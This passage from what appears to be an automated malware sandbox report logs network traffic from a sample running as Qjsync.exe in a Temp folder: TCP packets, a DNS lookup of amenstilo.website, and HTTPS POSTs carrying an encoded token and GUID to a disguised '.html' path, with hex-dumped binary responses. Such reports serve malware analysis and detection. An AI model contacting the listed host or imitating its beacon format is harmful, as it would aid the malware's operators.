Dec 2, 2024 07:25:21.758651972 CET	443	49866	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.797985077 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.798022985 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:21.798089981 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.798635006 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:21.798649073 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.104589939 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.104692936 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.105920076 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.105931044 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.106173992 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.106946945 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.106998920 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.107007980 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.765916109 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.765988111 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.766130924 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.766269922 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.766290903 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.766304016 CET	49872	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.766311884 CET	443	49872	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.799525976 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.799545050 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:23.799659967 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.799963951 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:23.799976110 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.059247971 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.059446096 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.060666084 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.060673952 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.060910940 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.061674118 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.061728001 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.061748028 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.061801910 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.061808109 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.722336054 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.722410917 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.722472906 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.722619057 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.722629070 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.722642899 CET	49877	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.722649097 CET	443	49877	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.860040903 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.860057116 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:25.860117912 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.860456944 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:25.860466003 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:27.072774887 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:27.072841883 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:27.074110985 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:27.074115038 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:27.074345112 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:27.075419903 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:27.075553894 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:27.075587988 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:27.075762033 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:27.075798035 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:27.075926065 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:27.075967073 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:27.076637983 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:27.076646090 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:28.178352118 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:28.178420067 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:28.178591967 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:28.178692102 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:28.178698063 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:28.178725958 CET	49883	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:28.178729057 CET	443	49883	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:28.201210976 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:28.201224089 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:28.205295086 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:28.206444979 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:28.206455946 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:29.464638948 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:29.464751005 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:29.704260111 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:29.704273939 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:29.704665899 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:29.705576897 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:29.705674887 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:29.705681086 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:30.359344006 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:30.359407902 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:30.359452963 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:30.361656904 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:30.361660957 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:25:30.361699104 CET	49889	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:25:30.361702919 CET	443	49889	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:08.829299927 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:08.829344988 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:08.829459906 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:08.830988884 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:08.831003904 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.090061903 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.090177059 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:10.091335058 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:10.091342926 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.091547012 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.139403105 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:10.139446020 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:10.139471054 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.993316889 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.993371010 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.993398905 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.993416071 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:10.993437052 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.993473053 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.993486881 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:10.993494987 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:10.993536949 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:10.993544102 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.001688957 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.001725912 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.001734972 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.018635988 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.018678904 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.018691063 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.067861080 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.113215923 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.113282919 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.113358974 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.113367081 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.161623001 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.194865942 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.198688030 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.198726892 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.198754072 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.198764086 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.198827982 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.206592083 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.214706898 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.214788914 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.214798927 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.222698927 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.222759962 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.222767115 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.230752945 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.230828047 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.230835915 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.238626003 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.238687992 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.238696098 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.254730940 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.254798889 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.254807949 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.261090040 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.261173964 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.261181116 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.267587900 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.267625093 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.267648935 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.267657042 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.267704964 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.274033070 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.280518055 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.280585051 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.280592918 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.330955029 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.331001997 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.331012011 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.380366087 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.380377054 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.398082972 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.398143053 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.398152113 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.402864933 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.402940989 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.402950048 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.403002977 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.412151098 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.412159920 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.412233114 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.412241936 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.412290096 CET	49981	443	192.168.2.6	104.21.74.149
Dec 2, 2024 07:26:11.412292004 CET	443	49981	104.21.74.149	192.168.2.6
Dec 2, 2024 07:26:11.412353039 CET	49981	443	192.168.2.6	104.21.74.149

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2024 07:25:06.331974983 CET	63460	53	192.168.2.6	1.1.1.1
Dec 2, 2024 07:25:06.668667078 CET	53	63460	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 2, 2024 07:25:06.331974983 CET	192.168.2.6	1.1.1.1	0x2de4	Standard query (0)	amenstilo.website	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 2, 2024 07:24:03.460922003 CET	1.1.1.1	192.168.2.6	0x36f3	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:24:03.460922003 CET	1.1.1.1	192.168.2.6	0x36f3	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:25:06.668667078 CET	1.1.1.1	192.168.2.6	0x2de4	No error (0)	amenstilo.website	104.21.74.149	A (IP address)	IN (0x0001)	false
Dec 2, 2024 07:25:06.668667078 CET	1.1.1.1	192.168.2.6	0x2de4	No error (0)	amenstilo.website	172.67.159.100	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

amenstilo.website

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49835	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:08 UTC	372	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Content-Length: 96 Host: amenstilo.website
2024-12-02 06:25:08 UTC	96	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 2d 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-12-02 06:25:08 UTC	886	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 06:25:08 GMT Transfer-Encoding: chunked Connection: close id: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2ByBA8VMOXolwoUuyomAVLdnVG00utGNDC2MbYbTf%2Bn83CqnIdkJLJBzbMXpHykIjfrH4p5IWkKck73E7zETatjLNcF0vZSA8yG6DQ7nbKCnEE00NXvnbPZT8JFd3d9CwpaFYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93ceac87a42e1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1701&rtt_var=646&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1104&delivery_rate=1682027&cwnd=230&unsent_bytes=0&cid=76739fd95943d77a&ts=891&x=0"
2024-12-02 06:25:08 UTC	483	IN	Data Raw: 33 37 39 63 0d 0a 4d 89 f9 31 00 00 00 00 00 00 00 00 69 7a 00 00 bf 03 2d 0a 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 bf 03 04 12 c6 5f 00 39 e9 b8 92 25 0f 13 06 14 00 05 00 05 05 11 14 0a 19 b5 b5 bd 25 0f 08 84 5b b8 78 4a f3 94 96 58 50 c4 ce e4 35 00 6b 0c 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 35 00 08 ae be 89 c6 7c 95 58 7b b6 10 55 31 47 35 fc 5d 44 0c b5 01 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 44 0c 04 04 19 d4 66 2e d7 c6 f1 6e 02 f8 0c 10 00 04 00 05 05 11 14 0a 19 d2 d2 d5 6e 02 04 dd 69 18 70 f7 42 ff e2 b7 06 42 00 14 00 08 00 05 05 11 14 0a 19 e9 e9 c0 b7 06 08 b1 33 be aa dc a6 4d 1f a9 9d 62 5d e7 06 e9 39 d5 0a fe 0b 14 00 2b 00 05 05 11 14 0a 19 b5 b5 c0 d5 0a 08 84 5b b8 78 4a f3 94 96 e2 ce d4 d4 c6 e4 ea b4 8e e4 d2 d6 de ca b4 ce Data Ascii: 379cM1iz-_9%%[xJXP5k5\|X{U1G5]DDf.nnipBB3Mb]9+[xJ
2024-12-02 06:25:08 UTC	1369	IN	Data Raw: e1 6c 3c e8 ce 8b ae 1c 0b cb 01 14 00 07 00 05 05 11 14 0a 19 b5 b5 da 1c 0b 08 84 5b b8 78 4a f3 94 96 8e d0 fe 84 c6 ea da 4a 07 92 0d 14 00 06 00 05 05 11 14 0a 19 b5 b5 bf 4a 07 08 84 5b b8 78 4a f3 94 96 58 50 d2 e0 ec d0 b1 0e d4 09 14 00 06 00 05 05 11 14 0a 19 b5 b5 c0 b1 0e 08 84 5b b8 78 4a f3 94 96 86 fc d2 c4 e6 ea cf 0b 14 0c 14 00 05 00 05 05 11 14 0a 19 b5 b5 e7 cf 0b 08 84 5b b8 78 4a f3 94 96 58 50 d4 c4 c8 35 0e 41 01 14 00 08 00 05 05 11 14 0a 19 e9 e9 d5 35 0e 08 48 78 0d 3f 9b dd 58 3c 50 c2 d1 c8 a0 7d fc 1a a2 06 53 00 14 00 0f 00 05 05 11 14 0a 19 b5 b5 bd a2 06 08 84 5b b8 78 4a f3 94 96 aa c6 ea ea de d2 d0 4c aa e4 d2 e8 ce c2 c6 67 02 9c 0f 10 00 04 00 05 05 11 14 0a 19 d2 d2 c0 67 02 04 9d fc 0a 52 b5 d3 ed c0 25 0d 83 0a 10 Data Ascii: l<[xJJJ[xJXP[xJ[xJXP5A5Hx?X<P}S[xJLggR%
2024-12-02 06:25:08 UTC	1369	IN	Data Raw: 50 c6 fc c6 53 0a 2b 0c 14 00 08 00 05 05 11 14 0a 19 e9 e9 da 53 0a 08 42 92 ba b9 04 b5 71 e5 5a 3c 66 4e 3f 15 d5 c3 98 06 70 04 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 98 06 08 e4 73 8e a6 f3 06 45 6e fc dd 52 51 c8 a6 e1 48 c7 09 2b 03 14 00 05 00 05 05 11 14 0a 19 b5 b5 bd c7 09 08 84 5b b8 78 4a f3 94 96 58 50 de d0 de fb 0a d5 09 14 00 08 00 05 05 11 14 0a 19 e9 e9 99 fb 0a 08 e3 b7 f2 e3 93 65 37 07 fb 19 2e 14 a8 c5 93 21 70 03 9a 00 14 00 06 00 05 05 11 14 0a 19 b5 b5 fd 70 03 08 84 5b b8 78 4a f3 94 96 a0 de c6 e2 c6 e8 2e 04 55 05 14 00 06 00 05 05 11 14 0a 19 b5 b5 bd 2e 04 08 84 5b b8 78 4a f3 94 96 58 50 d4 d2 ca da 0d 01 7f 0f 14 00 09 00 05 05 11 14 0a 19 b5 b5 71 0d 01 08 84 5b b8 78 4a f3 94 96 94 d2 c2 de d0 84 ce e4 ce da 09 8b 0b 14 Data Ascii: PS+SBqZ<fN?psEnRQH+[xJXPe7.!pp[xJ.U.[xJXPq[xJ
2024-12-02 06:25:08 UTC	1369	IN	Data Raw: 50 de d0 c4 c6 fc c6 c4 c4 c8 50 d4 c6 e0 c6 d4 c4 c8 f5 04 39 08 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd f5 04 08 ac 6c 80 1f 56 49 90 33 b0 c2 5c e8 6d e9 34 15 81 06 26 0d 14 00 09 00 05 05 11 14 0a 19 b5 b5 bd 81 06 08 84 5b b8 78 4a f3 94 96 58 50 ca d2 e8 e8 e6 ec e4 5b 09 57 00 10 00 04 00 05 05 11 14 0a 19 d2 d2 c0 5b 09 04 db 43 fa 4d f0 6c 1d df 0f 01 fe 07 14 00 05 00 05 05 11 14 0a 19 b5 b5 e7 0f 01 08 84 5b b8 78 4a f3 94 96 58 50 d4 c4 c8 30 0a 2d 01 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 30 0a 04 27 ef 2a e6 0c c0 cd 74 1b 0f 2a 09 14 00 0c 00 05 05 11 14 0a 19 b5 b5 da 1b 0f 08 84 5b b8 78 4a f3 94 96 ea c6 e8 e0 de ca c6 50 ca d2 d0 c0 87 06 ea 08 14 00 08 00 05 05 11 14 0a 19 e9 e9 da 87 06 08 97 84 3f b5 7b e0 fb 48 8f 2a e3 42 40 40 5f Data Ascii: PP9lVI3\m4&[xJXP[W[CMl[xJXP0-0't[xJP?{H*B@@_
2024-12-02 06:25:08 UTC	1369	IN	Data Raw: 00 04 00 05 05 11 14 0a 19 d2 d2 bd cb 04 04 83 0e de d8 a8 21 39 4a d2 03 fa 06 14 00 0b 00 05 05 11 14 0a 19 b5 b5 f6 d2 03 08 84 5b b8 78 4a f3 94 96 9e d0 ea e4 ce d4 d4 ac ce e4 dc be 07 1c 00 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 be 07 04 85 aa 1c 0b af 64 0e 9c 0b 00 02 07 14 00 07 00 05 05 11 14 0a 19 b5 b5 e7 0b 00 08 84 5b b8 78 4a f3 94 96 9c de ea e4 d2 e8 fe 01 02 04 06 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 01 02 04 17 8a 78 9f 3d 44 6a 08 59 0b ba 0b 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 59 0b 08 e5 54 3d f0 b3 7e e5 41 f8 fa e1 07 88 de 41 67 38 02 6d 05 14 00 08 00 05 05 11 14 0a 19 e9 e9 fd 38 02 08 7e c9 1e 3f da ba e5 5b 66 67 c2 c8 e1 1a 41 7d 86 0b 67 06 10 00 04 00 05 05 11 14 0a 19 d2 d2 da 86 0b 04 43 6a e8 2a 68 45 0f b8 66 0b Data Ascii: !9J[xJd[xJx=DjYYT=~AAg8m8~?[fgA}gCj*hEf
2024-12-02 06:25:08 UTC	1369	IN	Data Raw: 11 14 0a 19 b5 b5 d5 b5 0e 08 84 5b b8 78 4a f3 94 96 d6 c6 ea ea c6 d0 c2 c6 e8 ea b4 a4 c6 d4 c6 c2 e8 ce d6 b4 84 c6 ea da e4 d2 ec b4 e4 c4 ce e4 ce 77 0d a2 07 14 00 08 00 05 05 11 14 0a 19 e9 e9 da 77 0d 08 59 31 41 30 45 15 fa 07 40 9f 9d c7 7e b5 5e 21 19 09 52 06 14 00 48 00 05 05 11 14 0a 19 b5 b5 c0 19 09 08 84 5b b8 78 4a f3 94 96 e2 ce d4 d4 c6 e4 ea b4 98 ce fc fc 94 de c8 c6 e8 e4 fe b4 ca d2 d6 50 d4 de c8 c6 e8 e4 fe 50 d8 ce fc fc b4 9e d0 c4 c6 fc c6 c4 84 88 b4 c0 de d4 c6 b2 b2 6c 50 de d0 c4 c6 fc c6 c4 c4 c8 50 d4 c6 e0 c6 d4 c4 c8 d6 0b c9 01 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd d6 0b 08 9d 40 f4 8a 7a 17 9f 89 81 ee 28 7d 41 b7 3b af ed 04 a2 0a 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 ed 04 04 03 d7 4b c1 29 19 59 56 61 0a 19 03 Data Ascii: [xJwwY1A0E@~^!RH[xJPPlPP@z(}A;K)YVa
2024-12-02 06:25:08 UTC	1369	IN	Data Raw: d2 d2 e7 fe 03 04 4b 8c 47 24 61 42 55 b3 98 01 ce 04 14 00 1e 00 05 05 11 14 0a 19 b5 b5 d5 98 01 08 84 5b b8 78 4a f3 94 96 d6 c6 ea ea c6 d0 c2 c6 e8 ea b4 84 de ea ca d2 e8 c4 b4 84 c6 e0 c6 d4 d2 ec d6 c6 d0 e4 9b 02 cd 0c 10 00 04 00 05 05 11 14 0a 19 d2 d2 bd 9b 02 04 52 1c 61 18 78 37 86 8a 4e 0b 8e 05 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 4e 0b 08 67 e3 db 33 84 1e 18 02 7a 4d 07 c4 bf be bc 24 04 04 b9 08 10 00 04 00 05 05 11 14 0a 19 d2 d2 da 04 04 04 97 40 bd 37 bc 6f 5a a5 8a 0d 6a 08 14 00 1f 00 05 05 11 14 0a 19 b5 b5 ca 8a 0d 08 84 5b b8 78 4a f3 94 96 c0 e4 ec b4 80 de d4 c6 b8 de d4 d4 ce b4 e8 c6 ca c6 d0 e4 ea c6 e8 e0 c6 e8 ea 50 fc d6 d4 74 0d 88 05 14 00 12 00 05 05 11 14 0a 19 b5 b5 c0 74 0d 08 84 5b b8 78 4a f3 94 96 8e e8 d6 d2 Data Ascii: KG$aBU[xJRax7NNg3zM$@7oZj[xJPtt[xJ
